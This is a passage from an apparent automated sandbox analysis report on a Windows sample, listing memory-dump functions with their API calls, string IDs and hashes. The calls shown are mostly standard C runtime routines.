                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E78B0
                                                              • int.LIBCPMTD ref: 005E78C9
                                                                • Part of subcall function 005E1E00: std::_Lockit::_Lockit.LIBCPMT ref: 005E1E16
                                                                • Part of subcall function 005E1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 005E1E40
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E7909
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E7971
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                              • String ID: (w^
                                                              • API String ID: 3053331623-632446344
                                                              • Opcode ID: 7ace4968ac98d6248b4e56db48cb8d9a19e0b128ac1266f8956c4550c46372db
                                                              • Instruction ID: b27d1712de0bfb968d172f4f8a917f98ea1f35a865ec5e31334c4f5844e25300
                                                              • Opcode Fuzzy Hash: 7ace4968ac98d6248b4e56db48cb8d9a19e0b128ac1266f8956c4550c46372db
                                                              • Instruction Fuzzy Hash: 58315EB0D0424ADFCB08DF95C895BEEBBB5BF88310F204619E455B7391DB305A40CBA1
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E7DD0
                                                              • int.LIBCPMTD ref: 005E7DE9
                                                                • Part of subcall function 005E1E00: std::_Lockit::_Lockit.LIBCPMT ref: 005E1E16
                                                                • Part of subcall function 005E1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 005E1E40
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E7E29
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E7E91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                              • String ID: O_^
                                                              • API String ID: 3053331623-897003143
                                                              • Opcode ID: 2ed3fbaa3e53259586453409a994e190349617a5c6b6f76e09a2acf57f281857
                                                              • Instruction ID: 48f6b02dd64f85133f9225e91faee2bb54a80193b484babce42424a436659187
                                                              • Opcode Fuzzy Hash: 2ed3fbaa3e53259586453409a994e190349617a5c6b6f76e09a2acf57f281857
                                                              • Instruction Fuzzy Hash: F1314AB0D0068ADFCB08EFA5D895BFEBBB5BF48310F204659E45567391DB306A00CBA1
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,005F89CC,005EDE01,CE3BFFFF,00000000,005EEC9B,00000000,?,005F8BF6,00000022,FlsSetValue,0060CEC8,0060CED0,005EEC9B), ref: 005F897E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: e41d4a04e7644877af87643f4dccea1bd4d6076142d3cb6047bfcaa1fdfe5d04
                                                              • Instruction ID: 5ba9c059b75644c7d216da01d4d87a330c1552024a21e851ede5cd80af984866
                                                              • Opcode Fuzzy Hash: e41d4a04e7644877af87643f4dccea1bd4d6076142d3cb6047bfcaa1fdfe5d04
                                                              • Instruction Fuzzy Hash: 6B212B31A41219ABC7219725DC44ABB3F6AFF41770F254515FB06B7291EBB4ED00C6E1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Fgetc
                                                              • String ID:
                                                              • API String ID: 1720979605-0
                                                              • Opcode ID: e4bf427345fcae5a7101f3a998cca7563d5e779dd5171b51e434bf30e2c30830
                                                              • Instruction ID: d382ae5006bfd7848853da941a7a610c3456abe7cb49372b18b77a799e978534
                                                              • Opcode Fuzzy Hash: e4bf427345fcae5a7101f3a998cca7563d5e779dd5171b51e434bf30e2c30830
                                                              • Instruction Fuzzy Hash: AF6192B1C0018A9FCB1CEBE5C956AEEBB74BF54341F604569E19277281EB345E04CF91
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,005ECA41,005EB191,005EA6CA), ref: 005ECA58
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005ECA66
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005ECA7F
                                                              • SetLastError.KERNEL32(00000000,005ECA41,005EB191,005EA6CA), ref: 005ECAD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 983c347c6f49bae7637244d6a17cba4e6fd1b2ebb91ca6524387644d8d51cd9a
                                                              • Instruction ID: ceeff01ecc7c66a17bb7f7484c24d5f4c7f83d9ed709945daea3335b4af3e5e8
                                                              • Opcode Fuzzy Hash: 983c347c6f49bae7637244d6a17cba4e6fd1b2ebb91ca6524387644d8d51cd9a
                                                              • Instruction Fuzzy Hash: 5F01687310831A9EE72CD776BC8DA6A2E56FB02375338423AF554821F1EF608C02A164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$`^q$`^q$`^q$`^q${$Yl^
                                                              • API String ID: 0-1775292322
                                                              • Opcode ID: 3ec1427e95bc4a8886b2348aa1e731d7bed49d0178e2bc93e754bb194dd35855
                                                              • Instruction ID: ba7f09d730abdcb37c37ea6a937eedb50ea7f6acf2db8d85796b039820c6ecdb
                                                              • Opcode Fuzzy Hash: 3ec1427e95bc4a8886b2348aa1e731d7bed49d0178e2bc93e754bb194dd35855
                                                              • Instruction Fuzzy Hash: 19B193B4E012199FCF55DFA9D99099DBBF6FF88304B14862AE409AB314DB34ED05CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$`^q$`^q$`^q$`^q${$Yl^
                                                              • API String ID: 0-1775292322
                                                              • Opcode ID: a592dd7163032f37af0a198093f240cf406758b460c9ee03134d64fff1587b67
                                                              • Instruction ID: f364c2a3d8cabdff68c6e57928cdea64dd41aa5d6f77311e3efcd0071be1862e
                                                              • Opcode Fuzzy Hash: a592dd7163032f37af0a198093f240cf406758b460c9ee03134d64fff1587b67
                                                              • Instruction Fuzzy Hash: 10A192B4E012199FCF54DFA9D99099DBBF6FF88304B14862AE409AB314DB34ED05CB90
                                                              APIs
                                                              • _strrchr.LIBCMT ref: 005F7CE0
                                                              • _strrchr.LIBCMT ref: 005F7CEA
                                                              • _strrchr.LIBCMT ref: 005F7CFF
                                                                • Part of subcall function 005F7531: RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                                • Part of subcall function 005F7531: GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                                • Part of subcall function 005F146A: IsProcessorFeaturePresent.KERNEL32(00000017,005F143C,?,?,?,?,00000000,?,?,?,005F06BA,00000000,00000000,00000000,00000000,00000000), ref: 005F146C
                                                                • Part of subcall function 005F146A: GetCurrentProcess.KERNEL32(C0000417), ref: 005F148F
                                                                • Part of subcall function 005F146A: TerminateProcess.KERNEL32(00000000), ref: 005F1496
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                              • String ID: .com
                                                              • API String ID: 3694955208-4200470757
                                                              • Opcode ID: 8e11b7900edcf4068622d1db1ce87774fd536da91a19a78c672c91f6c8f17e78
                                                              • Instruction ID: e8f1c467d71226389e2d7de97b67925dcf198940b10b3ff6a962fceed3033e90
                                                              • Opcode Fuzzy Hash: 8e11b7900edcf4068622d1db1ce87774fd536da91a19a78c672c91f6c8f17e78
                                                              • Instruction Fuzzy Hash: E7512C7250860E6AEF156A34AC49A7F3F5EFF99364F14059DFB00D7182FA698D0182A4
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,005EDBA3,?,?,006195C4,00000000,?,005EDCCE,00000004,InitializeCriticalSectionEx,0060AC1C,InitializeCriticalSectionEx,00000000), ref: 005EDB72
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: a58eb3ce17270e493c32e67fe0a4fee9d9d1942cd37be1c40548e8c0f0ee5304
                                                              • Instruction ID: 6fded04b8b90dea96857fcd90979531f38e11d12af4f88eb0890575eb50e603f
                                                              • Opcode Fuzzy Hash: a58eb3ce17270e493c32e67fe0a4fee9d9d1942cd37be1c40548e8c0f0ee5304
                                                              • Instruction Fuzzy Hash: C111CD31941665ABDF254B599C44B5A3BBEBF017B0F160211E995EB180F770ED00CAF5
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9EDA4073,005EEC9B,?,00000000,00608A03,000000FF,?,005F37F2,CE3BFFFF,?,005F37C6,?), ref: 005F388D
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F389F
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00608A03,000000FF,?,005F37F2,CE3BFFFF,?,005F37C6,?), ref: 005F38C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 4748708afdbcf74dac3c048c94088a6e4fa73dde8ab21067cc3355614c7d5b29
                                                              • Instruction ID: f8408689c4b83d0c4233f7dbac5efcaf17e59380d1cc84de589d0ffbd65df2f5
                                                              • Opcode Fuzzy Hash: 4748708afdbcf74dac3c048c94088a6e4fa73dde8ab21067cc3355614c7d5b29
                                                              • Instruction Fuzzy Hash: B001A731980659EFDB019F50CC05BBFBBBAFB04755F004629F812A26D0DB789904CA90
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 005FC118
                                                              • __alloca_probe_16.LIBCMT ref: 005FC1E1
                                                              • __freea.LIBCMT ref: 005FC248
                                                                • Part of subcall function 005F9045: RtlAllocateHeap.NTDLL(00000000,005FF487,00000000,?,005FF487,00000220,?,?,00000000), ref: 005F9077
                                                              • __freea.LIBCMT ref: 005FC25B
                                                              • __freea.LIBCMT ref: 005FC268
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1423051803-0
                                                              • Opcode ID: 8302ed66a2e2c689f92b35dcef2f1fbe542db6b565b7a7a70185f72c6d7197cd
                                                              • Instruction ID: 15d4367f099bedeaf71408c1fbf90cde6ac8cd8534d6376209edafdfa81a7009
                                                              • Opcode Fuzzy Hash: 8302ed66a2e2c689f92b35dcef2f1fbe542db6b565b7a7a70185f72c6d7197cd
                                                              • Instruction Fuzzy Hash: D851C07660020EAFDB209FA1DD89EBB3EA9FF84B10F150439FE44D6151EA39DC10D660
                                                              APIs
                                                              • std::ios_base::good.LIBCPMTD ref: 005E6DD2
                                                              • std::ios_base::getloc.LIBCPMTD ref: 005E6E54
                                                              • char_traits.LIBCPMTD ref: 005E6EE8
                                                              • std::ios_base::good.LIBCPMTD ref: 005E6F7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                              • String ID:
                                                              • API String ID: 1920461149-0
                                                              • Opcode ID: 1e913e89373a45d428b77791a3e7aa9ffa734fd43d045e87a5f2b4991c2479d9
                                                              • Instruction ID: 68897fe1ca2a4868c9ca65924ec907f834196f47b5faff714d7c39b27647d963
                                                              • Opcode Fuzzy Hash: 1e913e89373a45d428b77791a3e7aa9ffa734fd43d045e87a5f2b4991c2479d9
                                                              • Instruction Fuzzy Hash: 2A517EB4E0024ADFCF08DF95D896ABEBFB5BF98354F144159E5516B391CB30A940CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-0
                                                              • Opcode ID: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                              • Instruction ID: 9856004592fabfe05566bd6d7924b79526b72990f43217e5b721cc3af4c7ec02
                                                              • Opcode Fuzzy Hash: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                              • Instruction Fuzzy Hash: F03198B5D0018A6BCF0CEBA2D8559EE7F79BF90380F044469E5C55B242EB31DA45CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: f^
                                                              • API String ID: 0-1307980213
                                                              • Opcode ID: bafcf08ba17a40135bf4e0e310fcd069eaafe722958be1158c25a59da5bd7344
                                                              • Instruction ID: 4ba1e7fb749f6acb5036336495e508b4f0f4aa56325989547d0eda8a1dcf31f3
                                                              • Opcode Fuzzy Hash: bafcf08ba17a40135bf4e0e310fcd069eaafe722958be1158c25a59da5bd7344
                                                              • Instruction Fuzzy Hash: 2D117FB164060EABE711BBB99C4D7BE3FA9BF49721F540045E7019B191DFB888408B76
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(9EDA4073,00000000,00000000,?), ref: 005F6A8E
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005F6CE0
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005F6D26
                                                              • GetLastError.KERNEL32 ref: 005F6DC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 1b7573db3b47502c532b46b1060408c64972c7d9e8a43d81a1f282141cce17bf
                                                              • Instruction ID: b5d6950ca85275a6d445385a9d15d103a6978ef9712abfb145cad6392d72fc06
                                                              • Opcode Fuzzy Hash: 1b7573db3b47502c532b46b1060408c64972c7d9e8a43d81a1f282141cce17bf
                                                              • Instruction Fuzzy Hash: E9D18AB5E0025D9FCF14CFA8C8949ADBFB9FF48310F28852AE556EB352D634A941CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: a55e1e80d00d9d3cc173c1b1e6c803b194af2af029cd9bd26cc5c61e3eff619f
                                                              • Instruction ID: f0d649b6d8417a4c092e47711776696402e14ecc6b0f9fe3e7fbf3b372703492
                                                              • Opcode Fuzzy Hash: a55e1e80d00d9d3cc173c1b1e6c803b194af2af029cd9bd26cc5c61e3eff619f
                                                              • Instruction Fuzzy Hash: DB51E2B26002869FEB2D8F22C846BBA7FA4FF44710F244529E89D5B291D731EC52C790
                                                              APIs
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • GetLastError.KERNEL32 ref: 005FEA03
                                                              • __dosmaperr.LIBCMT ref: 005FEA0A
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 005FEA44
                                                              • __dosmaperr.LIBCMT ref: 005FEA4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: ccebc81a447bf1871c4924c5ac080d1c20f605425e2e525a84c77d67db735ce1
                                                              • Instruction ID: 9efded4ca0d8e4c8f66759c3edb26eb13c94317eca5a0714c751739d2f0607d3
                                                              • Opcode Fuzzy Hash: ccebc81a447bf1871c4924c5ac080d1c20f605425e2e525a84c77d67db735ce1
                                                              • Instruction Fuzzy Hash: CF21C87160020EAFDB10AF65CC8A83BBFAAFF553647108419FB5997161D739ED508760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf9da8fb5f8a7124d2fb6563c917c60d4d66ad3d7cf6b2e0ea25ea66fd5a9bae
                                                              • Instruction ID: f3c4a6c1ce34a584849a0ef2782040585956a24522f7614d1890e2e010591271
                                                              • Opcode Fuzzy Hash: cf9da8fb5f8a7124d2fb6563c917c60d4d66ad3d7cf6b2e0ea25ea66fd5a9bae
                                                              • Instruction Fuzzy Hash: F921D4B160420EBFDB20AF718D4493B7FAABF80364F108919FA55D7151EB78EC9087A0
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 005FF92F
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FF967
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FF987
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
